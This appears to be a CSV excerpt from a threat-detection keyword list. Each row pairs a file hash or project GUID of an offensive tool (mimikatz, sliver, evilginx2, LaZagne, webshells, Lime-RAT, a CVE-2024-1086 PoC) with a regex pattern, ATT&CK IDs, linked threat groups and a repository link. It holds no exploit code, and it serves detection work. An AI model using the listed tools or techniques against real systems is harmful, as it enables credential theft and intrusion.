"*8A516D69-BA38-429F-AFFE-C571B5C1E482*",".{0,1000}8A516D69\-BA38\-429F\-AFFE\-C571B5C1E482.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#GUIDproject","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","30602"
"*8a56ab0ff1d36594b9c06968b1aff8c6537dffc8e7695729cc419db4c8364d00*",".{0,1000}8a56ab0ff1d36594b9c06968b1aff8c6537dffc8e7695729cc419db4c8364d00.{0,1000}","offensive_tool_keyword","FudgeC2","FudgeC2 - a command and control framework designed for team collaboration and post-exploitation activities.","T1021.002 - T1105 - T1059.001 - T1059.003","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/Ziconius/FudgeC2","1","0","#filehash","N/A","10","10","253","54","2023-05-01T21:13:56Z","2018-09-09T21:05:21Z","30604"
"*8a575a3e31ecbc724c5b7755ef14a0f645da3cd33ee57f9c91d74b1d94cdf772*",".{0,1000}8a575a3e31ecbc724c5b7755ef14a0f645da3cd33ee57f9c91d74b1d94cdf772.{0,1000}","offensive_tool_keyword","ProtectMyTooling","Multi-Packer wrapper letting us daisy-chain various packers obfuscators and other Red Team oriented weaponry","T1027 - T1202","TA0005","N/A","N/A","Resource Development","https://github.com/mgeeky/ProtectMyTooling","1","0","#filehash","N/A","7","10","947","136","2024-12-06T20:10:02Z","2021-09-28T09:47:45Z","30605"
"*8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4*",".{0,1000}8a586d7528567dec07746cd375daf9cf8828abee9806fda6125d73323d4fbee4.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","30606"
"*8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597*",".{0,1000}8a5d969cab714560a2c7109d7a70bf653d860b846929d2db55782f4ec2604597.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","30610"
"*8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e*",".{0,1000}8a65c348023a1a5555beb0cde66891fd39dcbd8e6fc02c1ce2022ac2afe68a5e.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30611"
"*8a76966ffd6c4c29c203928df3e585e3384588e7ea2a70ab9f6f6d1bcf16ecd7*",".{0,1000}8a76966ffd6c4c29c203928df3e585e3384588e7ea2a70ab9f6f6d1bcf16ecd7.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","30612"
"*8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a*",".{0,1000}8a92acfe944c48f247b50ea26cb82f367e668959c115739c025d1ad4ca59a27a.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","30615"
"*8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379*",".{0,1000}8a997da8acb30a57bc25ad0913fd6ad163cb6829e40344ac4b352ef0674c0379.{0,1000}","offensive_tool_keyword","POC","local privilege escalation Proof-of-Concept exploit for CVE-2024-1086 working on most Linux kernels between v5.14 and v6.6","T1068 - T1548.002","TA0004","N/A","N/A","Privilege Escalation","https://github.com/Notselwyn/CVE-2024-1086","1","0","#filehash #linux","CVE-2024-1086 POC","10","10","2357","314","2024-04-17T16:09:54Z","2024-03-20T21:16:41Z","30616"
"*8aa085e49959c67e804b50f07be758f3b9bf46f3da8a0e6612d6bf4f089f603e*",".{0,1000}8aa085e49959c67e804b50f07be758f3b9bf46f3da8a0e6612d6bf4f089f603e.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30617"
"*8aa1f48415cfbe283b446c451d7c834234a9e6cf564d0d45a2803ed7a739c4f8*",".{0,1000}8aa1f48415cfbe283b446c451d7c834234a9e6cf564d0d45a2803ed7a739c4f8.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30618"
"*8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99*",".{0,1000}8aac7bb51d605351a79f988d1b1772ae94d4b8ab4622118259effad125719e99.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0001","N/A","BlackCat - COLDRIVER","Phishing","https://github.com/An0nUD4Y/evilginx2","1","0","#filehash","N/A","10","","N/A","","","","30619"
"*8aadca4c38166f4dc6f70126b094c2b86d7150fecf48bdcee668cc29b35001df*",".{0,1000}8aadca4c38166f4dc6f70126b094c2b86d7150fecf48bdcee668cc29b35001df.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","30620"
"*8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABl4ZX1IYD7piGA*",".{0,1000}8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA6AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABl4ZX1IYD7piGA.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","30621"
"*8ab8e1d302f81af6f3c240642489b297c549de98a7e46c8436cba750bf288b51*",".{0,1000}8ab8e1d302f81af6f3c240642489b297c549de98a7e46c8436cba750bf288b51.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","0","#filehash","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","30622"
"*8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c*",".{0,1000}8aba74be7acef3c84cef0163411298aa994872347a4ac84cc0a0d19ddf0eb65c.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","#filehash","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","30623"
"*8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e*",".{0,1000}8ac384fed6ad25cb08874eb3dc9b45c80084fa5518ec5a7fa79e3f5d5e40b66e.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","30624"
"*8ace2f6b59f88eea47c07022c330c7fc91811d1a9f39148a3212f844a2dcd9a4*",".{0,1000}8ace2f6b59f88eea47c07022c330c7fc91811d1a9f39148a3212f844a2dcd9a4.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","30625"
"*8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4*",".{0,1000}8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30628"
"*8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4*",".{0,1000}8adec30a4cdb8fce2a24ab2bfcf1849324fd0639e9ce73f7c250e979ce5df0c4.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30629"
"*8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e*",".{0,1000}8ae33d1da163dd41ff4bfe07f9b290d6fa2a46b592735ec9734477534760ea5e.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","30631"
"*8ae7a65345d809173343b02d58019e287e108d4688e483d761c89976e3ab2c9e*",".{0,1000}8ae7a65345d809173343b02d58019e287e108d4688e483d761c89976e3ab2c9e.{0,1000}","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tool","https://github.com/BeichenDream/SharpToken","1","0","#filehash","N/A","N/A","5","467","66","2023-11-24T19:21:57Z","2022-06-30T07:34:57Z","30632"
"*8ae9eef729fd1a1c02406804d5c54d7dcd14507b77110ed543360fdb4f5b2f6d*",".{0,1000}8ae9eef729fd1a1c02406804d5c54d7dcd14507b77110ed543360fdb4f5b2f6d.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","30633"
"*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30634"
"*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30635"
"*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30636"
"*8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd*",".{0,1000}8aec1bef3b7e7e8d8adcf79bdc1d0efcd6eaa94c2fa22e42dd1b21ecc49333cd.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","30637"
"*8aed04233ee4b33500c6af6da612bed71770628910a761c325987d24737c5c28*",".{0,1000}8aed04233ee4b33500c6af6da612bed71770628910a761c325987d24737c5c28.{0,1000}","offensive_tool_keyword","RottenPotatoNG","perform the RottenPotato attack and get a handle to a privileged token","T1134.001 - T1055.012 - T1547.001","TA0004","N/A","Sandworm","Privilege Escalation","https://github.com/breenmachine/RottenPotatoNG","1","0","#filehash","N/A","8","10","935","183","2017-12-29T14:38:47Z","2017-12-29T13:19:03Z","30638"
"*8af3cfb3abdb8084e68290f3f14d0656b45dcb2f35e47ae1641666bc18f1f114*",".{0,1000}8af3cfb3abdb8084e68290f3f14d0656b45dcb2f35e47ae1641666bc18f1f114.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","30639"
"*8af3e901ab7c19e8ad6f8d8caab23bb8ef1c9577aa4a5c5e4b43309306c4a11a*",".{0,1000}8af3e901ab7c19e8ad6f8d8caab23bb8ef1c9577aa4a5c5e4b43309306c4a11a.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","30640"
"*8af4a9eec787d4d04a62fc1690acb4988bb753e430e38be4754ad24f3af0d084*",".{0,1000}8af4a9eec787d4d04a62fc1690acb4988bb753e430e38be4754ad24f3af0d084.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30641"
"*8af8c2cf6d5bb1a72a9d0ac3a534ba4d68ae6188aea4fbcf93c9fa5ebde47588*",".{0,1000}8af8c2cf6d5bb1a72a9d0ac3a534ba4d68ae6188aea4fbcf93c9fa5ebde47588.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","30643"
"*8b02540e34bb947d712daeffb713755041a7ee73f8bdb0f5a7a2fbf2d8113e1d*",".{0,1000}8b02540e34bb947d712daeffb713755041a7ee73f8bdb0f5a7a2fbf2d8113e1d.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in  to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","#filehash","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","30645"
"*8b02fcc3d2b456afebba8cf41d7540794f0af7a9a1ff2a080b89400b75b3c407*",".{0,1000}8b02fcc3d2b456afebba8cf41d7540794f0af7a9a1ff2a080b89400b75b3c407.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","30646"
"*8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47*",".{0,1000}8b081e47fc6d4ab5dc0483dcc7243ff66911b9e660ab8ad9296a7144e95dbd47.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext   APIs   custom algorithms   databases   etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1555 - T1555.001 - T1555.003 - T1555.004 - T1003.001 - T1003.004 - T1003.005 - T1003.007 - T1003.008 - T1552.001","TA0006 - TA0009","N/A","Akira - AvosLocker - LockBit - GoGoogle - 8BASE - RansomEXX - Leafminer - Wizard Spider - APT3 - Scattered Spider - OilRig - MuddyWater - Inception - APT33 - TeamTNT - Tonto Team - Evilnum - CHRYSENE - GOLD DUPONT","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","#filehash","N/A","10","10","9941","2062","2025-04-10T14:24:35Z","2015-02-16T14:10:02Z","30647"
"*8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356*",".{0,1000}8b181b6d9004ec5341ed9adeaaf5f43ece0479da86687e7f3e70788d282df356.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","30650"
"*8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51*",".{0,1000}8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30651"
"*8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51*",".{0,1000}8b1840ee863f4ae4a930b7306feaac10201344bb6da49401b2673ffc5c9c0f51.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","30652"
"*8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76*",".{0,1000}8b1b47c29bc124e99ea4e2d0b9d16ae4c8042b26f4592c46bcadb208dd780f76.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","30653"
"*8b1f0a69-a930-42e3-9c13-7de0d04a4add*",".{0,1000}8b1f0a69\-a930\-42e3\-9c13\-7de0d04a4add.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#GUIDproject","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","30654"
"*8b27ef8f7cbae47922e672618e39abe7fa626c7405a67b12d7a88c1da8b06cad*",".{0,1000}8b27ef8f7cbae47922e672618e39abe7fa626c7405a67b12d7a88c1da8b06cad.{0,1000}","offensive_tool_keyword","PewPewPew","host a script on a PowerShell webserver, invoke the IEX download cradle to download/execute the target code and post the results back to the server","T1059.001 - T1102 - T1056 - T1071 - T1086 - T1123","TA0011 - TA0010 - TA0005 - TA0002 - TA0009 - TA0006","N/A","N/A","Credential Access","https://github.com/PowerShellEmpire/PowerTools","1","0","#filehash","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","30655"
